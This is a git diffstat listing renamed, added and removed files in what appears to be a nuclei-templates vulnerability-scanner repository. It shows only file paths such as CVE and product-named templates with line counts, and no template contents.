.../symantec-messaging-gateway-10607.yaml | 23 + .../Other/symantec-messaging-gateway.yaml | 19 - .../Other/symfony-database-config-10616.yaml | 2 + nuclei-templates/Other/symfonyrce(1).yaml | 26 + .../Other/synology-web-station-10632.yaml | 23 + .../Other/synology-web-station.yaml | 23 - ...638.yaml => szhe-default-login-10635.yaml} | 0 .../Other/tableau-panel-10641.yaml | 25 + nuclei-templates/Other/tableau-panel.yaml | 25 - ...10644.yaml => tabnabbing-check-10646.yaml} | 0 ...ronos-rce-10647.yaml => tamronos-rce.yaml} | 0 ...10655.yaml => targa-camera-lfi-10654.yaml} | 0 .../Other/tave-takeover-10659.yaml | 15 + nuclei-templates/Other/tave-takeover.yaml | 15 - nuclei-templates/Other/tcpconfig-10663.yaml | 23 - nuclei-templates/Other/tcpconfig-10666.yaml | 19 + .../teamcity-registration-enabled-10667.yaml | 31 - .../Other/teamcity-registration-enabled.yaml | 34 + .../{4147374715.yaml => teamviewer.yaml} | 0 .../Other/teamwork-takeover-10668.yaml | 18 + .../Other/teamwork-takeover-10671.yaml | 18 - nuclei-templates/Other/tech-detect-10674.yaml | 2667 - nuclei-templates/Other/tech-detect-10677.yaml | 2688 + .../Other/tectuus-scada-monitor-10679.yaml | 24 + .../Other/tectuus-scada-monitor.yaml | 25 - ...o-leak.yaml => tekon-info-leak-10684.yaml} | 0 .../telecom-gateway-default-login-10686.yaml | 37 + .../Other/telecom-gateway-default-login.yaml | 43 - .../telerik-dialoghandler-detect-10690.yaml | 40 - .../Other/telerik-dialoghandler-detect.yaml | 37 + .../telerik-fileupload-detect-10693.yaml | 8 +- .../Other/teradici-pcoip-10702.yaml | 19 - .../Other/teradici-pcoip-10704.yaml | 23 + ...etect.yaml => terraform-detect-10707.yaml} | 0 .../terraform-enterprise-panel-10711.yaml | 31 - .../Other/terraform-enterprise-panel.yaml | 27 + ....yaml => tg8preauthrce-220331-222435.yaml} | 0 nuclei-templates/Other/thinkCMF_include.yaml | 20 + ...nkcmf-arbitrary-code-execution-10715.yaml} | 0 .../Other/thinkcmf-lfi-10722.yaml | 24 + .../Other/thinkcmf-rce-10729.yaml | 27 + nuclei-templates/Other/thinkcmf-rce.yaml | 23 - nuclei-templates/Other/thinkcmf_include.yaml | 22 - .../Other/thinkific-redirect-10735.yaml | 6 +- .../Other/thinkphp-5022-rce-10746.yaml | 54 +- .../Other/thinkphp-5023-rce-10749.yaml | 32 - .../Other/thinkphp-5023-rce-10751.yaml | 32 + .../Other/threatq-login-10756.yaml | 33 - .../Other/threatq-login-10757.yaml | 29 + nuclei-templates/Other/thruk-xss.yaml | 5 + .../Other/thumbs-db-disclosure-10761.yaml | 3 + .../Other/tianqing-info-leak-10765.yaml | 33 + .../Other/tianqing-info-leak.yaml | 37 - ...10767.yaml => tictail-takeover-10768.yaml} | 0 nuclei-templates/Other/tidb-unauth-10772.yaml | 26 - nuclei-templates/Other/tidb-unauth.yaml | 28 + nuclei-templates/Other/tiki.yaml | 24 + ...cms-10776.yaml => tikiwiki-cms-10775.yaml} | 0 .../Other/tikiwiki-reflected-xss-10778.yaml | 27 + .../Other/tikiwiki-reflected-xss.yaml | 27 - .../Other/tileserver-gl-10787.yaml | 33 + nuclei-templates/Other/tileserver-gl.yaml | 33 - nuclei-templates/Other/time-based-sqli.yaml | 33 + nuclei-templates/Other/time-sql-test.yaml | 22 - .../Other/time-sqlinjection-uri-finder.yaml | 42 + .../Other/time_sql_peremeter.yaml | 492 + nuclei-templates/Other/tinypng.yaml | 24 + nuclei-templates/Other/titannit-web-rce.yaml | 37 - nuclei-templates/Other/titannit-web-ssrf.yaml | 37 + .../Other/tomcat-default-login-10791.yaml | 17 +- ...ct-10793.yaml => tomcat-detect-10794.yaml} | 0 .../Other/tomcat-examples-login.yaml | 49 + .../tomcat-examples-login_CVE-2022-34305.yaml | 44 - ... => tomcat-manager-pathnormalization.yaml} | 0 .../Other/tomcat-scripts-10803.yaml | 24 - nuclei-templates/Other/tomcat-scripts.yaml | 26 + .../Other/top-xss-params-10806.yaml | 75 - .../Other/top-xss-params-10807.yaml | 75 + ...tect-10819.yaml => totemomail-detect.yaml} | 0 ...3.yaml => tpshop-directory-traversal.yaml} | 0 .../Other/trace-axd-detect-10825.yaml | 20 - .../Other/trace-axd-detect-10826.yaml | 19 + .../Other/trace-method-10827.yaml | 26 - nuclei-templates/Other/trace-method.yaml | 31 + .../Other/traefik-dashboard-10832.yaml | 17 - nuclei-templates/Other/traefik-dashboard.yaml | 15 + ...l => trilithic-viewpoint-login-10839.yaml} | 0 .../Other/tugboat-config-exposure-10843.yaml | 33 - .../Other/tugboat-config-exposure.yaml | 28 + .../Other/tumblr-takeover-10845.yaml | 10 +- .../Other/turbocrm-xss-10848.yaml | 9 +- .../tuxedo-connected-controller-10852.yaml | 22 - .../tuxedo-connected-controller-10853.yaml | 20 + nuclei-templates/Other/twenty-detect.yaml | 2 +- .../Other/twig-php-ssti-10856.yaml | 26 - .../Other/twig-php-ssti-10858.yaml | 14 + nuclei-templates/Other/twitter-secret(1).yaml | 13 + nuclei-templates/Other/twitter-secret.yaml | 16 - .../Other/txt-fingerprint-10863.yaml | 32 - nuclei-templates/Other/txt-fingerprint.yaml | 22 + ...0866.yaml => uberflip-takeover-10864.yaml} | 0 .../Other/ueditor-file-upload-10872.yaml | 22 - .../Other/ueditor-file-upload-10876.yaml | 24 + .../Other/ultimatemember-open-redirect.yaml | 20 - ...ssrf-10882.yaml => umbraco-base-ssrf.yaml} | 0 nuclei-templates/Other/umbraco.yaml | 21 - ...{unauth-ftp.yaml => unauth-ftp-10939.yaml} | 0 ...aml => unauth-hoteldruid-panel-10943.yaml} | 0 .../Other/unauth-message-read-10945.yaml | 40 - .../Other/unauth-message-read.yaml | 45 + nuclei-templates/Other/unauth-rlm-10960.yaml | 19 - ...k-api.yaml => unauth-spark-api-10965.yaml} | 0 .../Other/unauth-wavink-panel-10966.yaml | 40 - .../Other/unauth-wavink-panel.yaml | 48 + ...aml => unauth-xproxy-dashboard-10968.yaml} | 0 ...aml => unauthenticated-airflow-10886.yaml} | 0 ... unauthenticated-alert-manager-10888.yaml} | 0 .../Other/unauthenticated-glowroot-10902.yaml | 32 + .../Other/unauthenticated-glowroot.yaml | 27 - .../Other/unauthenticated-influxdb-10903.yaml | 27 - .../Other/unauthenticated-influxdb.yaml | 27 + ... => unauthenticated-jenkin-dashboard.yaml} | 0 .../Other/unauthenticated-jenkins.yaml | 29 - .../unauthenticated-mongo-express-10909.yaml | 26 + .../Other/unauthenticated-mongo-express.yaml | 24 - .../unauthenticated-nacos-access-10915.yaml | 35 + .../Other/unauthenticated-nacos-access.yaml | 29 - .../Other/unauthenticated-netdata-10918.yaml | 30 + .../Other/unauthenticated-netdata.yaml | 25 - .../Other/unauthenticated-prtg-10924.yaml | 20 - .../Other/unauthenticated-prtg.yaml | 24 + ...=> unauthenticated-tensorboard-10930.yaml} | 0 ...henticated-varnish-cache-purge-10931.yaml} | 0 .../Other/unauthenticated-zipkin-10936.yaml | 8 +- ...aml => unauthenticated-zippkin-10937.yaml} | 0 .../unauthorized-h3csecparh-login-10948.yaml | 10 +- ...authorized-hp-officepro-printer-10950.yaml | 24 + .../unauthorized-hp-officepro-printer.yaml | 24 - ...955.yaml => unauthorized-plastic-scm.yaml} | 0 ...ized-puppet-node-manager-detect-10958.yaml | 24 - ...authorized-puppet-node-manager-detect.yaml | 20 + .../Other/unbounce-takeover-10971.yaml | 18 - nuclei-templates/Other/unbounce-takeover.yaml | 15 + ...> unencrypted-bigip-ltm-cookie-10973.yaml} | 0 .../Other/unifi-network-log4j-rce-10974.yaml | 43 - .../Other/unifi-network-log4j-rce-10975.yaml | 38 + .../Other/unpatched-coldfusion-10977.yaml | 14 +- nuclei-templates/Other/ups-status-10985.yaml | 20 - nuclei-templates/Other/ups-status.yaml | 24 + .../Other/uptimerobot-takeover-10987.yaml | 15 - .../Other/uptimerobot-takeover-10988.yaml | 21 + .../Other/urge-takeover-10990.yaml | 18 - .../Other/vanguard-post-xss-10992.yaml | 29 + .../Other/vanguard-post-xss-10994.yaml | 35 - ...er-10996.yaml => vend-takeover-10998.yaml} | 0 ...-11000.yaml => vercel-takeover-11001.yaml} | 0 .../Other/versa-default-login-11003.yaml | 13 +- .../Other/vidyo-default-login.yaml | 11 +- .../Other/viewlinc-crlf-injection-11011.yaml | 29 - .../Other/viewlinc-crlf-injection-11014.yaml | 25 + ...aml => viewpoint-system-status-11019.yaml} | 0 nuclei-templates/Other/vigor-login-11021.yaml | 19 - nuclei-templates/Other/vigor-login.yaml | 20 + nuclei-templates/Other/vince-panel.yaml | 2 +- .../Other/virtual-ema-detect-11025.yaml | 21 + .../Other/virtual-ema-detect.yaml | 21 - ...aml => visionhub-default-login-11026.yaml} | 0 .../Other/visual-tools-dvr-rce-11030.yaml | 28 + .../Other/visual-tools-dvr-rce.yaml | 26 - .../Other/vmware-horizon-11040.yaml | 19 + ...l.yaml => vmware-horizon-panel-11036.yaml} | 0 .../Other/vmware-vcenter-lfi-11047.yaml | 32 - .../Other/vmware-vcenter-lfi-11048.yaml | 32 + .../Other/vmware-vcenter-lfi-linux-11044.yaml | 14 + .../Other/vmware-vcenter-lfi-linux-11045.yaml | 21 - .../vmware-vcenter-log4j-jndi-rce-11049.yaml | 38 - .../Other/vmware-vcenter-log4j-jndi-rce.yaml | 38 + .../Other/vmware-vcenter-ssrf-11051.yaml | 4 + ...-11054.yaml => vmware-version-detect.yaml} | 0 .../Other/vmware-workflow-11059.yaml | 11 + nuclei-templates/Other/vmware-workflow.yaml | 11 - nuclei-templates/Other/vnc-detect-11061.yaml | 22 + nuclei-templates/Other/vnc-detect.yaml | 26 - ...ect.yaml => voipmonitor-detect-11063.yaml} | 0 nuclei-templates/Other/voipmonitor-rce.yaml | 38 + ...w-11064.yaml => voipmonitor-workflow.yaml} | 0 .../Other/voipmonitorrce-220331-222339.yaml | 34 - .../Other/vpms-auth-bypass-11066.yaml | 33 + .../Other/vpms-auth-bypass-11069.yaml | 31 - ...aml => vrealize-operations-log4j-rce.yaml} | 0 ...11073.yaml => vsftpd-detection-11076.yaml} | 0 nuclei-templates/Other/wadl-api-11084.yaml | 38 - nuclei-templates/Other/wadl-api-11085.yaml | 43 + ...etect-11089.yaml => waf-detect-11087.yaml} | 0 .../Other/wago-plc-panel-11093.yaml | 3 + .../Other/wamp-xdebug-detect-11100.yaml | 19 + .../Other/wamp-xdebug-detect-11104.yaml | 16 - ...-rce-1.yaml => wangkang-NS-ASG-rce-1.yaml} | 0 ...tchguard-credentials-disclosure-11105.yaml | 4 + .../Other/wazuh-detect-11110.yaml | 22 + .../Other/wazuh-detect-11111.yaml | 25 - ...azuh-panel-11113.yaml => wazuh-panel.yaml} | 0 nuclei-templates/Other/weatherlink-11117.yaml | 6 +- .../weave-scope-dashboard-detect-11118.yaml | 20 - .../weave-scope-dashboard-detect-11120.yaml | 18 + nuclei-templates/Other/web-config-11127.yaml | 157 +- ...-craft-11141.yaml => web-local-craft.yaml} | 0 ...-xss-web-message.yaml => web-message.yaml} | 0 nuclei-templates/Other/web-suite-detect.yaml | 7 +- nuclei-templates/Other/webeditors-11129.yaml | 26 + nuclei-templates/Other/webeditors.yaml | 31 - ...11131.yaml => webflow-takeover-11133.yaml} | 0 ...-11144.yaml => weblogic-detect-11142.yaml} | 0 .../Other/weblogic-iiop-detect-11147.yaml | 24 + .../Other/weblogic-iiop-detect.yaml | 24 - .../Other/weblogic-login-11149.yaml | 24 - nuclei-templates/Other/weblogic-login.yaml | 30 + .../Other/weblogic-t3-detect-11152.yaml | 41 + .../Other/weblogic-t3-detect.yaml | 38 - .../Other/webmin-panel-11158.yaml | 2 +- .../Other/webmodule-ee-11162.yaml | 21 + ...nel.yaml => webmodule-ee-panel-11161.yaml} | 0 nuclei-templates/Other/webmodule-ee.yaml | 19 - ...talk-leakage.yaml => webtalk-leakage.yaml} | 0 ...ols-home.yaml => webtools-home-11169.yaml} | 0 nuclei-templates/Other/webui-rce-11172.yaml | 32 + nuclei-templates/Other/webui-rce.yaml | 25 - ...l => webview-addjavascript-interface.yaml} | 0 .../Other/webview-javascript-enabled.yaml | 13 +- .../Other/webview-load-url-11180.yaml | 15 - nuclei-templates/Other/webview-load-url.yaml | 16 + ...ml => webview-universal-access-11184.yaml} | 0 .../Other/weiphp-sql-injection-11190.yaml | 5 + ...ml => werkzeug-debugger-detect-11198.yaml} | 0 ...ly-panel-11211.yaml => wildfly-panel.yaml} | 0 ...xss-11212.yaml => window-name-domxss.yaml} | 0 .../Other/wireless-leakage(1).yaml | 24 + .../Other/wishpond-takeover-11218.yaml | 5 +- .../Other/wondercms-detect-11223.yaml | 25 + nuclei-templates/Other/wondercms-detect.yaml | 21 - .../Other/wooyun-2015-148227(1).yaml | 26 - .../Other/wooyun-2015-148227-11225.yaml | 25 + .../Other/wooyun-2015-148227-11227.yaml | 32 + .../Other/wooyun-2015-148227.yaml | 26 - .../Other/wooyun-path-traversal-11229.yaml | 27 - .../Other/wooyun-path-traversal-11233.yaml | 29 + nuclei-templates/Other/wordpress-LFI.yaml | 25 - .../wordpress-accessible-wpconfig.yaml} | 0 .../wordpress-bbpress-plugin-listing.yaml | 22 + .../Other/wordpress-debug-log.yaml | 11 +- nuclei-templates/Other/wordpress-detect.yaml | 40 + .../wordpress-directory-listing-11266.yaml | 17 + .../wordpress-elementor-plugin-listing.yaml} | 0 ...s-emails-verification-for-woocommerce.yaml | 24 - .../Other/wordpress-git-config.yaml | 31 - nuclei-templates/Other/wordpress-lfi(1).yaml | 21 + .../wordpress-rdf-user-enum.yaml | 0 .../wordpress-redirection-plugin-listing.yaml | 26 + .../wordpress-ssrf-oembed.yaml | 2 +- .../Other/wordpress-theme-detect.yaml | 28 - ...ordpress-total-upkeep-backup-download.yaml | 26 + .../wordpress-updraftplus-pem-key.yaml} | 0 .../Other/wordpress-user-enum.yaml | 28 + .../wordpress-user-enumeration-11329.yaml} | 0 .../Other/wordpress-woocommerce-listing.yaml | 23 - .../wordpress-wordfence-waf-bypass-xss.yaml | 25 + .../wordpress-workflow.yaml | 0 .../wordpress-wpcourses-info-disclosure.yaml | 31 + .../wordpress-xmlrpc-listmethods.yaml | 0 nuclei-templates/Other/wordpress.yaml | 52062 ++ ...1380.yaml => workresources-rdp-11382.yaml} | 0 .../Other/worksites-detection-11385.yaml | 14 - .../Other/worksites-detection.yaml | 17 + ...ver.yaml => worksites-takeover-11388.yaml} | 0 .../wp-123contactform-plugin-listing.yaml | 24 + ...{wp-app-log.yaml => wp-app-log-11411.yaml} | 0 ...onfig-check.yaml => wp-engine-config.yaml} | 0 nuclei-templates/Other/wp-finder-xss.yaml | 24 - .../wp-full-path-disclosure.yaml} | 0 .../Other/wp-iwp-client-listing.yaml | 22 - .../Other/wp-license-file-11489.yaml | 22 + .../wp-mailchimp-log-exposure.yaml | 7 +- .../Other/wp-multiple-theme-ssrf.yaml | 27 - .../Other/wp-oxygen-theme-lfi.yaml | 8 +- .../wp-slideshow-xss.yaml} | 0 nuclei-templates/Other/wp-tutor-lfi.yaml | 19 - .../Other/wp-vault-lfi-11609.yaml | 6 +- .../wp-woocommerce-pdf-invoice-listing.yaml | 2 +- nuclei-templates/Other/wp-xmlrpc-11631.yaml | 16 + .../{upkeep_wordpress.yaml => wpbackup.yaml} | 0 .../Other/wso2-2019-0598-11635.yaml | 22 +- ...aml => wso2-management-console-11644.yaml} | 0 .../Other/wso2mgmtconsole(1).yaml | 31 - nuclei-templates/Other/wso2mgmtconsole.yaml | 35 + .../Other/wufoo-takeover-11648.yaml | 20 - .../Other/wufoo-takeover-11651.yaml | 17 + .../Other/wuzhicms-detect-11655.yaml | 24 + nuclei-templates/Other/wuzhicms-detect.yaml | 29 - ...li-11656.yaml => wuzhicms-sqli-11658.yaml} | 0 .../Other/x-forwarded-header.yaml | 22 + ..._.yaml => x-forwarded-host-injection.yaml} | 0 nuclei-templates/Other/x-forwarded-host.yaml | 19 - .../Other/xampp-default-page-11663.yaml | 7 +- nuclei-templates/Other/xdcms-sqli-11664.yaml | 38 - nuclei-templates/Other/xdcms-sqli.yaml | 36 + .../Other/xds-amr-status-11669.yaml | 60 +- ...ro-login.yaml => xenforo-login-11673.yaml} | 0 ...-login-11677.yaml => xenmobile-login.yaml} | 0 .../Other/xerox-efi-lfi-11683.yaml | 28 - nuclei-templates/Other/xerox-efi-lfi.yaml | 23 + .../Other/xerox7-default-login-11680.yaml | 46 + .../Other/xerox7-default-login.yaml | 54 - .../Other/xff-403-bypass-11685.yaml | 14 +- .../Other/xml-schema-detect-11691.yaml | 24 - nuclei-templates/Other/xml-schema-detect.yaml | 21 + .../Other/xmlrpc-pingback-ssrf-11688.yaml | 42 + .../Other/xmlrpc-pingback-ssrf.yaml | 28 - nuclei-templates/Other/xp-webcam-11697.yaml | 22 + nuclei-templates/Other/xp-webcam.yaml | 26 - ...ervice.yaml => xprober-service-11695.yaml} | 0 nuclei-templates/Other/xss-fuzz-11700.yaml | 37 - nuclei-templates/Other/xss-fuzz-11701.yaml | 42 + ....yaml => xss-fuzz-html-tag-injection.yaml} | 0 ...ected-pitchfork.yaml => xss-headless.yaml} | 0 nuclei-templates/Other/xvr-login-11704.yaml | 23 - nuclei-templates/Other/xvr-login-11706.yaml | 19 + .../Other/xxljob-default-login-11713.yaml | 52 - .../Other/xxljob-default-login.yaml | 33 + ...job-panel-11715.yaml => xxljob-panel.yaml} | 0 nuclei-templates/Other/yapi-detect-11719.yaml | 21 - nuclei-templates/Other/yapi-detect-11721.yaml | 20 + .../{yapi-rce.yaml => yapi-rce-11725.yaml} | 0 .../{yarn-lock-11729.yaml => yarn-lock.yaml} | 0 .../Other/yarn-resourcemanager-rce-11737.yaml | 4 +- ...ger-11739.yaml => yii-debugger-11738.yaml} | 0 .../Other/yishaadmin-lfi-11742.yaml | 23 - .../Other/yishaadmin-lfi-11744.yaml | 27 + .../Other/yongyou-icurrtype-sqli.yaml | 37 + nuclei-templates/Other/yongyou-jdbcread.yaml | 42 - .../Other/yongyou-ssrf-11745.yaml | 18 - nuclei-templates/Other/yongyou-ssrf.yaml | 15 + ...gyou-u8-RegisterServlet-sql-Injection.yaml | 33 + ...yaml => yonyou-nc-cloud-jsinvoke-rce.yaml} | 0 .../Other/yonyou-u8-registerservlet-sqli.yaml | 26 - nuclei-templates/Other/yonyou-yonbip-lfi.yaml | 2 +- ..._ncchr_attachment_uploadchunk_upload.yaml} | 0 .../Other/yopass-panel-11749.yaml | 3 + ...fileread.yaml => yunxintong-fileRead.yaml} | 0 ...s-detect.yaml => yzmcms-detect-11751.yaml} | 0 .../Other/zabbix-dashboards-access-11756.yaml | 30 + .../Other/zabbix-dashboards-access.yaml | 24 - .../Other/zabbix-default-login-11760.yaml | 40 - .../Other/zabbix-default-login-11763.yaml | 35 + .../Other/zabbix-server-login-11767.yaml | 22 + .../Other/zabbix-server-login.yaml | 23 - nuclei-templates/Other/zabbix.yaml | 25 - .../Other/zcms-v3-sqli-11773.yaml | 21 + nuclei-templates/Other/zcms-v3-sqli.yaml | 21 - ...-file-11779.yaml => zend-config-file.yaml} | 0 ...11781.yaml => zendesk-takeover-11783.yaml} | 0 .../Other/zentao-detect-11785.yaml | 3 - .../Other/zhixiangOA-msg.aspx-sql.yaml | 22 + .../Other/zhixiangOA-msglog.aspx-sql.yaml | 22 - .../Other/zhiyuan-file-upload-11791.yaml | 27 + .../Other/zhiyuan-file-upload.yaml | 28 - .../Other/zhiyuan-oa-info-leak-11797.yaml | 26 - .../Other/zhiyuan-oa-info-leak-11799.yaml | 23 + .../Other/zhiyuan-oa-session-leak-11802.yaml | 21 + .../Other/zhiyuan-oa-session-leak-11804.yaml | 27 - .../Other/zhiyuan-oa-unauthorized-11806.yaml | 31 - .../Other/zhiyuan-oa-unauthorized-11808.yaml | 26 + .../Other/zimbra-preauth-ssrf-11811.yaml | 23 - .../Other/zimbra-preauth-ssrf.yaml | 20 + ...ient.yaml => zimbra-web-client-11812.yaml} | 0 .../Other/zip-backup-files-11815.yaml | 63 + .../Other/zip-backup-files-11817.yaml | 62 - .../Other/zipkin-exposure-11822.yaml | 6 +- .../Other/zmanda-default-login-11825.yaml | 38 + .../Other/zmanda-default-login.yaml | 39 - .../Other/zms-auth-bypass-11829.yaml | 35 - .../Other/zms-auth-bypass-11832.yaml | 36 + .../Other/zoho-webhook-token.yaml | 2 +- .../zoneminder-time-based-sql-injection.yaml | 31 - nuclei-templates/Other/zte-panel-11838.yaml | 21 - nuclei-templates/Other/zte-panel-11840.yaml | 24 + nuclei-templates/wordpress/2475241188.yaml | 22 - ...2011-1669.yaml => CVE-2011-1669-2041.yaml} | 0 .../wordpress/CVE-2011-4624-2078.yaml | 35 - .../wordpress/CVE-2011-4926-2087.yaml | 14 +- .../wordpress/CVE-2011-5179-2105.yaml | 35 - .../wordpress/CVE-2011-5181-2112.yaml | 33 + .../wordpress/CVE-2011-5265-2124.yaml | 15 +- .../wordpress/CVE-2012-0896-2135.yaml | 30 + nuclei-templates/wordpress/CVE-2012-0896.yaml | 27 - .../wordpress/CVE-2012-0901-2141.yaml | 32 + .../wordpress/CVE-2012-1835-2171.yaml | 38 + .../wordpress/CVE-2012-2371-2174.yaml | 29 - .../wordpress/CVE-2012-4273-2194.yaml | 25 - .../wordpress/CVE-2012-4768-2206.yaml | 25 - .../wordpress/CVE-2012-5913-2222.yaml | 30 - .../wordpress/CVE-2013-2287-2244.yaml | 25 + ...3526-2251.yaml => CVE-2013-3526-2251.yaml} | 0 .../wordpress/CVE-2013-4117-2263.yaml | 39 - ...2013-6281-2281.yaml => CVE-2013-6281.yaml} | 0 .../wordpress/CVE-2013-7240-2287.yaml | 36 - nuclei-templates/wordpress/CVE-2014-2383.yaml | 34 + .../wordpress/CVE-2014-4535-2346.yaml | 37 + .../wordpress/CVE-2014-4536-2353.yaml | 37 - .../wordpress/CVE-2014-4544-2360.yaml | 34 - .../wordpress/CVE-2014-4544-2362.yaml | 39 + .../wordpress/CVE-2014-4592-2380.yaml | 37 - nuclei-templates/wordpress/CVE-2014-4942.yaml | 58 - .../wordpress/CVE-2014-5368-2394.yaml | 29 - nuclei-templates/wordpress/CVE-2014-5368.yaml | 34 + .../wordpress/CVE-2014-9094-2422.yaml | 24 - .../wordpress/CVE-2015-1000012-2457.yaml | 28 - nuclei-templates/wordpress/CVE-2015-4414.yaml | 27 - ...4694-2542.yaml => CVE-2015-4694-2545.yaml} | 0 .../wordpress/CVE-2015-5461-2552.yaml | 19 + .../wordpress/CVE-2015-6920-2585.yaml | 27 - nuclei-templates/wordpress/CVE-2015-9304.yaml | 48 + nuclei-templates/wordpress/CVE-2015-9471.yaml | 45 + nuclei-templates/wordpress/CVE-2015-9498.yaml | 45 + .../wordpress/CVE-2016-1000128-2648.yaml | 32 + .../wordpress/CVE-2016-1000130-2659.yaml | 33 - .../wordpress/CVE-2016-1000132-2668.yaml | 35 + ...4-2679.yaml => CVE-2016-1000134-2680.yaml} | 0 .../wordpress/CVE-2016-1000135-2685.yaml | 30 - .../wordpress/CVE-2016-1000137-2690.yaml | 38 + .../wordpress/CVE-2016-1000137-2692.yaml | 33 - .../wordpress/CVE-2016-1000138-2694.yaml | 16 +- .../wordpress/CVE-2016-1000140-2706.yaml | 34 + .../wordpress/CVE-2016-1000141-2707.yaml | 35 - .../wordpress/CVE-2016-1000143-2717.yaml | 37 - .../wordpress/CVE-2016-1000146-2721.yaml | 34 - ...000148.yaml => CVE-2016-1000148-2724.yaml} | 0 .../wordpress/CVE-2016-1000149-2728.yaml | 35 - .../wordpress/CVE-2016-1000154-2737.yaml | 30 - .../wordpress/CVE-2016-1000154-2739.yaml | 34 + .../wordpress/CVE-2016-1000155-2744.yaml | 35 - .../wordpress/CVE-2016-10033-2747.yaml | 52 - .../wordpress/CVE-2016-10872.yaml | 51 + .../wordpress/CVE-2016-10884.yaml | 41 - .../wordpress/CVE-2016-10924-2754.yaml | 32 + .../wordpress/CVE-2016-10924.yaml | 35 - ...16-10940-2757.yaml => CVE-2016-10940.yaml} | 0 .../wordpress/CVE-2016-10956-2762.yaml | 30 + .../wordpress/CVE-2016-10960-2763.yaml | 39 - .../wordpress/CVE-2016-10960-2767.yaml | 36 + .../wordpress/CVE-2016-11085.yaml | 42 - .../wordpress/CVE-2017-18536-2995.yaml | 35 + .../wordpress/CVE-2017-18598-2997.yaml | 62 + .../wordpress/CVE-2017-18634.yaml | 43 - .../wordpress/CVE-2017-5487-3024.yaml | 41 - .../wordpress/CVE-2017-9288-3084.yaml | 34 - .../wordpress/CVE-2018-11709-3196.yaml | 34 - .../wordpress/CVE-2018-16299-3371.yaml | 30 + .../wordpress/CVE-2018-16299-3374.yaml | 29 - .../wordpress/CVE-2018-17207.yaml | 43 - ...18-20985.yaml => CVE-2018-20985-3505.yaml} | 0 .../wordpress/CVE-2018-3810-3554.yaml | 43 + .../wordpress/CVE-2018-3810-3555.yaml | 43 - .../wordpress/CVE-2018-7422-3592.yaml | 34 + nuclei-templates/wordpress/CVE-2018-7422.yaml | 34 - nuclei-templates/wordpress/CVE-2018-7543.yaml | 45 - .../wordpress/CVE-2018-8719-3642.yaml | 35 - .../wordpress/CVE-2019-10692(1).yaml | 35 - .../wordpress/CVE-2019-11869-3763.yaml | 45 - .../wordpress/CVE-2019-11869-3764.yaml | 47 - .../wordpress/CVE-2019-11869.yaml | 39 + .../wordpress/CVE-2019-13573.yaml | 40 + .../wordpress/CVE-2019-14205-3829.yaml | 41 - .../wordpress/CVE-2019-14313.yaml | 46 - ...470-3854.yaml => CVE-2019-14470-3854.yaml} | 0 .../wordpress/CVE-2019-15112.yaml | 38 + .../wordpress/CVE-2019-15116.yaml | 37 - .../wordpress/CVE-2019-15858-3888.yaml | 47 - .../wordpress/CVE-2019-16118.yaml | 45 + .../wordpress/CVE-2019-16219.yaml | 28 - .../wordpress/CVE-2019-16525-3937.yaml | 35 + .../wordpress/CVE-2019-16931.yaml | 41 - .../wordpress/CVE-2019-17232.yaml | 43 - .../wordpress/CVE-2019-17233.yaml | 42 + .../wordpress/CVE-2019-17673.yaml | 37 + .../wordpress/CVE-2019-20141.yaml | 32 + .../wordpress/CVE-2019-20209.yaml | 46 - .../wordpress/CVE-2019-20360.yaml | 41 + .../wordpress/CVE-2019-25141.yaml | 41 - .../wordpress/CVE-2019-6112-4177.yaml | 30 + nuclei-templates/wordpress/CVE-2019-9567.yaml | 43 - ...9618-4295.yaml => CVE-2019-9618-4295.yaml} | 0 nuclei-templates/wordpress/CVE-2019-9912.yaml | 38 - .../wordpress/CVE-2019-9978-4331.yaml | 22 + .../wordpress/CVE-2020-11515.yaml | 46 + .../wordpress/CVE-2020-11738-4430.yaml | 44 + .../wordpress/CVE-2020-11930-4444.yaml | 35 - ...800-4486.yaml => CVE-2020-12800-4488.yaml} | 0 .../wordpress/CVE-2020-14092.yaml | 29 - .../wordpress/CVE-2020-15299.yaml | 39 + ...20-24148.yaml => CVE-2020-24148-4790.yaml} | 0 .../wordpress/CVE-2020-24186-4797.yaml | 82 - .../wordpress/CVE-2020-24312-4805.yaml | 24 - .../wordpress/CVE-2020-25213-4859.yaml | 58 - .../wordpress/CVE-2020-26876-4926.yaml | 45 + .../wordpress/CVE-2020-26876.yaml | 57 - .../wordpress/CVE-2020-28036.yaml | 72 - .../wordpress/CVE-2020-28037.yaml | 42 + .../wordpress/CVE-2020-28038.yaml | 41 + .../wordpress/CVE-2020-28039.yaml | 41 - .../wordpress/CVE-2020-28978.yaml | 40 - .../wordpress/CVE-2020-29395-5005.yaml | 37 + .../wordpress/CVE-2020-35234-5025.yaml | 45 + .../wordpress/CVE-2020-35234.yaml | 31 - .../wordpress/CVE-2020-35749.yaml | 41 - .../wordpress/CVE-2020-36155.yaml | 56 + .../wordpress/CVE-2020-36157.yaml | 55 + .../wordpress/CVE-2020-36710.yaml | 50 - .../wordpress/CVE-2020-36739.yaml | 43 + .../wordpress/CVE-2020-36760.yaml | 38 + nuclei-templates/wordpress/CVE-2020-6859.yaml | 54 - nuclei-templates/wordpress/CVE-2020-7048.yaml | 21 + nuclei-templates/wordpress/CVE-2020-8436.yaml | 40 + nuclei-templates/wordpress/CVE-2020-8658.yaml | 48 - .../wordpress/CVE-2020-8771-5338.yaml | 55 + nuclei-templates/wordpress/CVE-2020-8772.yaml | 19 + nuclei-templates/wordpress/CVE-2020-9454.yaml | 34 + .../wordpress/CVE-2021-20792-5478.yaml | 48 - .../wordpress/CVE-2021-20792.yaml | 44 + .../wordpress/CVE-2021-21389-5511.yaml | 47 + .../wordpress/CVE-2021-24139.yaml | 43 + ...21-24146.yaml => CVE-2021-24146-5629.yaml} | 0 .../wordpress/CVE-2021-24148.yaml | 49 - .../wordpress/CVE-2021-24166.yaml | 50 + .../wordpress/CVE-2021-24210.yaml | 26 + .../wordpress/CVE-2021-24213.yaml | 40 + .../wordpress/CVE-2021-24226-5647.yaml | 29 + .../wordpress/CVE-2021-24228.yaml | 36 + .../wordpress/CVE-2021-24229.yaml | 42 - .../wordpress/CVE-2021-24230.yaml | 43 + .../wordpress/CVE-2021-24231.yaml | 39 + .../wordpress/CVE-2021-24235-5651.yaml | 26 - ...2021-24236.yaml => CVE-2021-24236(1).yaml} | 0 .../wordpress/CVE-2021-24274-5658.yaml | 33 + .../wordpress/CVE-2021-24274-5660.yaml | 32 - .../wordpress/CVE-2021-24278-5668.yaml | 38 + .../wordpress/CVE-2021-24284(1).yaml | 62 - ...285-5673.yaml => CVE-2021-24285-5672.yaml} | 0 .../wordpress/CVE-2021-24288-5679.yaml | 25 + .../wordpress/CVE-2021-24291-5681.yaml | 26 - 